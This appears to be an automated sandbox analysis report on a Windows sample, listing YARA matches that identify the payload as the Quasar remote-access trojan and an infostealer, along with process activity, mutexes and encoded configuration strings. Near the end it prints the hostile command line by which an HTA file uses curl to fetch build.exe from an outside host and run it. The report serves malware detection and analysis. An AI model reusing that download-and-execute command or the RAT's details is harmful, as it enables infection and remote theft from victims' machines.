              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_00417392 NtQueryDefaultLocale,5_2_00417392
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_004070F45_2_004070F4
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_0041CD005_2_0041CD00
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_0052D9105_2_0052D910
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_004169D25_2_004169D2
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_0041D2575_2_0041D257
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_00401ECD5_2_00401ECD
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_004166E15_2_004166E1
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_0041CABA5_2_0041CABA
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_004073025_2_00407302
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 9_2_0663A5509_2_0663A550
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 9_2_06639C809_2_06639C80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 9_2_066399389_2_06639938
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 9_2_0AE463599_2_0AE46359
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 9_2_0AE400D39_2_0AE400D3
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
              Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
              Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
              Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
              Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
              Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
              Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
              Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
              Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
              Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
              Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
              Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
              Source: 5.2.build.exe.64179a.1.raw.unpack, ----.csBase64 encoded string: 'wUl/f9Z9c0HJkgn0LkR3tgx0jNemZdZZXwtrjN37gTmQDAxJ4eNPr2zJxD5FzUY1jQK6EfZUz8L7LpT8o9WAQw==', 'vVjY5ZJ6o3UiZAcBxrVNLmrSiaHSFpdrImDrkV5LGLuTGeXI8KiLiDnHeoQPgWKXayXFoAm9/HPYQx9jgdEuUw==', 'NloEf4TXdEEtCAPA23YG77hR2gBZhlUN5TMEkM69F+Eyq9b1haRauu4n35RqUTobX693FMns3mIxEX0yOeSzgQ==', 'XdMKS0zmM2HqG9GB1xiQOPNEdup7dD0JGElTLtP+P7K5Dnyc0uQgFoqEeNn8lfszXBTQHP8SNtp2QEKv5Cc6pyOM0UMg6xlul+IBxcQoqFA=', '/M1VhpGWTx0I8npMFdssAo9WCr99LhMb3S5IME+AIGA7a506KCvXiQj+jZ6MhEim1zeP2ZJxzqpHwOWk66wdXQ==', 'prnH13WVqb4TCDeg4YtKiDyngbILmcdacqg0YSiDr2WBGmyAGWjNA3LD2I6nE9qzXt7sbFGVZ7vpLp6yHEghoA=='
              Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@10/3@3/4
              Source: C:\Windows\SysWOW64\curl.exeFile created: C:\Users\user\Desktop\build.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_DT5aFgoH5h6bbtKq7Q
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
              Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\build.hta"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
